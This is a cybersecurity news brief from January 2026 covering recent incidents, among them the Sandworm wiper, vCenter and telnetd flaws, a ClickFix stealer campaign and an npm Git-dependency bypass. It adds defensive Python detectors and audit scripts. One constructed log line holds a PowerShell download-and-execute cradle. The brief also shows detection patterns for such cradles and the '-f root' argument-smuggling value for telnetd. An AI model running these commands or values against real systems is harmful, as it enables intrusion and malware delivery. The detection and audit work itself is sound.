Svoboda Cybersecurity Brief January 27, 2026


Sandworm APT Targets Polish Power Grid with New Wiper Malware

Russian state-sponsored group Sandworm (APT44) deployed new DynoWiper malware in a December 2025 attack on Poland's power grid. The attack targeted combined heat and power (CHP) plants and a renewable energy management system but was stopped before it caused any disruption. The campaign fits Sandworm's decade-long record of attacks on critical infrastructure.
Source: SecurityWeek

VMware vCenter RCE Flaw (CVE-2024-37079) Actively Exploited

A critical heap-overflow vulnerability in the DCERPC protocol implementation of VMware vCenter Server is under active exploitation and allows unauthenticated remote code execution over the network. CISA has ordered federal agencies to patch within three weeks.
Impact: Unauthenticated remote code execution with low attack complexity.
Mitigation: Apply the VMware patches released in June 2024; the vendor lists no workarounds, so patching is the only fix.
Source: SecurityWeek

Stanley MaaS Tool Bypasses Chrome Web Store Security for Phishing

The Stanley malware-as-a-service toolkit, sold for $2,000 to $6,000, builds Chrome extensions that overlay a phishing page in a full-screen iframe while the address bar still shows the legitimate URL. Its operators advertise guaranteed passage through Google's Chrome Web Store review and support geotargeting of victims.
Impact: Credential theft through malicious browser extensions.
Mitigation: Restrict which extensions users may install (allowlist where possible), verify publishers, and monitor for suspicious extension activity.
Source: BleepingComputer

CISA Confirms Exploitation of VMware CVE-2024-37079 in the Wild

Broadcom confirmed active exploitation of the DCERPC heap-overflow flaw (CVSS 9.8) in vCenter Server. No workarounds exist; patching is the only mitigation.
Impact: Unauthenticated remote code execution by any host with network access to vCenter.
Mitigation: Upgrade to vCenter Server 8.0 U2d or later (7.0 U3r for the 7.0 line).
Source: SecurityWeek

ClickFix Campaign Abuses Windows App-V Scripts to Deploy Amatera Stealer

Attackers use fake CAPTCHA prompts to trick users into running a command that invokes an App-V script, which proxies execution to PowerShell and delivers the Amatera infostealer. The payload is hidden in PNG images with least-significant-bit (LSB) steganography.
Impact: Theft of credentials and browser data.
Mitigation: Disable App-V components where they are not needed, restrict PowerShell execution, and monitor outbound connections from script hosts and PowerShell.
Source: BleepingComputer
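Detection logic for the chain described above (fake CAPTCHA, App-V script, PowerShell), as an added example that is not code from BleepingComputer or the researchers who reported the campaign. It assumes the App-V script being abused is SyncAppvPublishingServer.vbs, a Windows script that runs PowerShell code passed after "n;" on its command line; the events it scans are constructed Sysmon-style process-creation records, and the IP address is from the TEST-NET range.

```python
"""Flag the ClickFix -> App-V script -> PowerShell chain in process-creation logs.
Added example. Assumes the App-V script is SyncAppvPublishingServer.vbs; the
events and the 203.0.113.10 address below are constructed."""
import json
import re

# Constructed Sysmon Event ID 1 records, one JSON object per line.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"Image": "C:\\Windows\\explorer.exe",
                "ParentImage": "C:\\Windows\\System32\\userinit.exe",
                "CommandLine": "explorer.exe"}),
    # Victim pasted the ClickFix text into the Run dialog: explorer.exe spawns wscript.exe.
    json.dumps({"Image": "C:\\Windows\\System32\\wscript.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "
                               "\"n;(New-Object Net.WebClient).DownloadString('http://203.0.113.10/c.ps1')|IEX\""}),
    json.dumps({"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Windows\\System32\\wscript.exe",
                "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass ..."}),
    # Benign: a scheduled App-V publishing refresh with no download or IEX tokens.
    json.dumps({"Image": "C:\\Windows\\System32\\wscript.exe",
                "ParentImage": "C:\\Windows\\System32\\svchost.exe",
                "CommandLine": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;\""}),
])

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Download-cradle and in-memory execution tokens common to PowerShell loaders.
DOWNLOAD_TOKENS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string",
    re.I)
# Lure text that ClickFix pages tell the victim to paste (heuristic, not exhaustive).
CLICKFIX_TOKENS = re.compile(r"not a robot|captcha|verification id", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Rule 1: App-V publishing script carrying a download cradle in its argument.
    if "syncappvpublishingserver.vbs" in cmd.lower() and DOWNLOAD_TOKENS.search(cmd):
        hits.append("appv_script_download_cradle")
    # Rule 2: PowerShell spawned by a script host; rare in legitimate automation.
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("powershell_from_script_host")
    # Rule 3: interpreter launched from explorer.exe (Run dialog) with lure or cradle text.
    if (parent == "explorer.exe"
            and image in SCRIPT_HOSTS + ("powershell.exe", "mshta.exe", "cmd.exe")
            and (CLICKFIX_TOKENS.search(cmd) or DOWNLOAD_TOKENS.search(cmd))):
        hits.append("run_dialog_clickfix")
    return hits


def scan(log_text: str) -> dict:
    """Map event index -> matched rule names for every suspicious event in a log."""
    results = {}
    for index, line in enumerate(log_text.splitlines()):
        if line.strip():
            hits = detect(json.loads(line))
            if hits:
                results[index] = hits
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: {', '.join(hits)}")
```

The benign refresh in the last event passes all three rules because it carries neither a download cradle nor a lure string; in production, rule 2 on its own is the broadest net and is worth keeping even when the exact script or lure text changes.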

800,000 Telnet Servers Vulnerable to GNU InetUtils Auth Bypass (CVE-2026-24061)

A critical flaw in GNU InetUtils' telnetd lets an unauthenticated client obtain root by supplying a crafted USER value such as "-f root", which telnetd hands to the login program as a command-line argument; to login, -f means the user is already authenticated. Shadowserver counts more than 800,000 exposed instances, most of them in Asia.
Impact: Unauthenticated root access.
Mitigation: Upgrade to InetUtils 2.8 or later, or disable telnetd. Telnet carries credentials in cleartext and should not be reachable from the Internet in any case.
Source: BleepingComputer

Cloudflare BGP Misconfiguration Causes IPv6 Route Leak

A 25-minute BGP misconfiguration caused Cloudflare to leak IPv6 routes, sending traffic the wrong way and dropping roughly 12 Gbps of it. The root cause was an overly permissive export policy at its Miami location.
Mitigation: Deploy RFC 9234 (BGP Roles and the Only-to-Customer attribute) and RPKI ASPA so that leaks of this kind are rejected automatically.
Source: BleepingComputer
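How RFC 9234 stops this class of leak, as an added illustration rather than Cloudflare's code or router configuration: the functions below implement the ingress and egress procedures of RFC 9234 section 5 in Python, and simulate_leak replays a constructed version of the scenario (made-up AS numbers and a documentation prefix) in which a route learned from a provider is offered to a peer by an export policy that is too permissive.

```python
"""RFC 9234 (BGP Roles + Only-to-Customer attribute) route-leak prevention.
Added illustration; the AS numbers and the prefix are constructed."""
from dataclasses import dataclass, replace
from typing import Optional, Tuple

# Neighbor roles from RFC 9234 section 4, as seen from the local AS.
PROVIDER, CUSTOMER, PEER, RS, RS_CLIENT = "provider", "customer", "peer", "rs", "rs-client"


@dataclass(frozen=True)
class Route:
    prefix: str
    as_path: Tuple[int, ...]
    otc: Optional[int] = None   # Only-to-Customer attribute; None when absent


def ingress(route: Route, neighbor_as: int, neighbor_role: str) -> Optional[Route]:
    """RFC 9234 section 5 ingress procedure for a route received from a
    neighbor of the given role. Returns None for a route leak (ineligible)."""
    if route.otc is not None:
        if neighbor_role in (CUSTOMER, RS_CLIENT):              # rule 1: leak
            return None
        if neighbor_role == PEER and route.otc != neighbor_as:  # rule 2: leak
            return None
    elif neighbor_role in (PROVIDER, PEER, RS):                 # rule 3: mark it
        return replace(route, otc=neighbor_as)
    return route


def egress(route: Route, local_as: int, neighbor_role: str) -> Optional[Route]:
    """RFC 9234 section 5 egress procedure before advertising to a neighbor of
    the given role. Returns None when the route must not be propagated."""
    if route.otc is not None and neighbor_role in (PROVIDER, PEER, RS):     # rule 2
        return None
    if route.otc is None and neighbor_role in (CUSTOMER, PEER, RS_CLIENT):  # rule 1
        return replace(route, otc=local_as)
    return route


def simulate_leak(local_as: int = 65001):
    """Constructed scenario: our provider (AS 65010) announces a prefix, and an
    export policy that is too permissive tries to re-advertise it to a peer
    (the error class behind the Cloudflare incident) and to a customer.
    Returns (what reaches the peer, what reaches the customer)."""
    learned = ingress(Route("2001:db8::/32", (65010,)), neighbor_as=65010, neighbor_role=PROVIDER)
    to_peer = egress(learned, local_as, PEER)          # blocked: OTC already set
    to_customer = egress(learned, local_as, CUSTOMER)  # allowed: stays in the customer cone
    return to_peer, to_customer


if __name__ == "__main__":
    peer, customer = simulate_leak()
    print("to peer:", peer, "| to customer:", customer)
```

The point of the OTC attribute is that the leak is caught even though the export policy itself is wrong: the route was marked "only to customers" on the way in, so the egress check rejects it regardless of what the prefix filters say. ASPA adds the complementary check on the AS_PATH for neighbors that do not yet speak RFC 9234.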

NPM Git Dependency Flaws Bypass Shai-Hulud Protections

A .npmrc file committed to a Git-hosted dependency can switch off the --ignore-scripts protection when npm builds that dependency from its repository, so whoever controls the repository gets arbitrary code execution at install time. pnpm and Bun have already shipped fixes.
Impact: Supply-chain compromise through Git-sourced dependencies.
Mitigation: Audit every Git-sourced dependency (pin it to a full commit hash and inspect its .npmrc and lifecycle scripts) and commit lockfiles.
Source: BleepingComputer
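An added audit script, not npm's code and not from the BleepingComputer report, that finds Git-sourced dependencies in a package-lock.json and inspects a checkout of each for the two things the bypass relies on: an .npmrc that changes how scripts run, and lifecycle hooks in package.json. The lockfile, the dependency widget-lib, its commit hash and its .npmrc contents are constructed for the example; that the override takes the form of settings such as ignore-scripts=false is an assumption about the technique.

```python
"""Audit Git-sourced npm dependencies for install-time code execution paths.
Added example; the lockfile, 'widget-lib' and its checkout are constructed."""
import json

LIFECYCLE = ("preinstall", "install", "postinstall", "preprepare", "prepare",
             "postprepare", "prepack", "postpack")
# .npmrc keys that change whether or how scripts run (assumed attacker targets).
RISKY_NPMRC_KEYS = {"ignore-scripts", "script-shell", "foreground-scripts"}

# Constructed package-lock.json (lockfile v3 layout).
SAMPLE_LOCK = json.loads("""{
  "name": "app", "lockfileVersion": 3,
  "packages": {
    "": {"dependencies": {"left-pad": "^1.3.0", "widget-lib": "github:example-org/widget-lib"}},
    "node_modules/left-pad": {"version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
    "node_modules/widget-lib": {"version": "2.1.0",
      "resolved": "git+ssh://git@github.com/example-org/widget-lib.git#0123456789abcdef0123456789abcdef01234567"}
  }
}""")

# Constructed contents of the widget-lib checkout at the pinned commit.
SAMPLE_CHECKOUTS = {
    "widget-lib": {
        ".npmrc": "# innocuous-looking config\nregistry=https://registry.npmjs.org/\nignore-scripts=false\n",
        "package.json": {"name": "widget-lib", "version": "2.1.0",
                         "scripts": {"build": "tsc", "postinstall": "node scripts/setup.js"}},
    }
}


def git_dependencies(lock: dict) -> dict:
    """Name -> Git URL for every Git-sourced entry (lockfile v1, v2 or v3)."""
    found = {}
    for path, meta in lock.get("packages", {}).items():          # v2/v3: 'resolved'
        src = meta.get("resolved", "")
        if path and src.startswith(("git+", "git:")):
            found[path.rsplit("node_modules/", 1)[-1]] = src
    for name, meta in lock.get("dependencies", {}).items():     # v1: 'version'
        src = meta.get("version", "")
        if src.startswith(("git+", "git:")):
            found[name] = src
    return found


def parse_npmrc(text: str) -> dict:
    """Minimal .npmrc parser: key=value lines, '#' or ';' comments."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", ";")):
            key, _, value = line.partition("=")
            settings[key.strip().lower()] = value.strip()
    return settings


def audit(lock: dict, checkouts: dict) -> list:
    """Findings for each Git dependency whose checkout carries a script-related
    .npmrc setting or a lifecycle hook. URLs not pinned to a full commit hash
    are reported too, because their content can change after review."""
    findings = []
    for name, url in git_dependencies(lock).items():
        if "#" not in url or len(url.rsplit("#", 1)[1]) != 40:
            findings.append(f"{name}: not pinned to a full commit hash ({url})")
        tree = checkouts.get(name, {})
        for key, value in parse_npmrc(tree.get(".npmrc", "")).items():
            if key in RISKY_NPMRC_KEYS:
                findings.append(f"{name}: .npmrc sets {key}={value}")
        for hook in tree.get("package.json", {}).get("scripts", {}):
            if hook in LIFECYCLE:
                findings.append(f"{name}: lifecycle hook {hook!r} runs at install")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOCK, SAMPLE_CHECKOUTS):
        print(finding)
```

For a real audit, load the project's lockfile with json.load and build the checkouts map by cloning each dependency at its pinned commit and reading .npmrc and package.json from the clone; the check runs before npm install, so nothing from the repository executes while it is being inspected.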

Hungarian-Romanian Police Arrest Hackers for Swatting, Doxing

Four suspects coordinated fake bomb threats and doxing over disputes that began on Discord, triggering large-scale police responses.
Source: DataBreaches

Crunchbase Confirms Data Breach After ShinyHunters Leak

ShinyHunters leaked about 400 MB of corporate data, including PII and contracts, after Crunchbase refused to pay a ransom. Crunchbase attributes the breach to a network intrusion.
Source: SecurityWeek

Badbox 2.0 Botnet Operators Linked to Chinese Developers

Administrators of the Kimwolf botnet breached Badbox 2.0's control panel, exposing ties to Beijing-based firms such as Astrolink Wireless. Badbox malware is present on Android TV boxes before they reach buyers.
Source: KrebsOnSecurity

Share this brief: https://svo.bz/qVYC
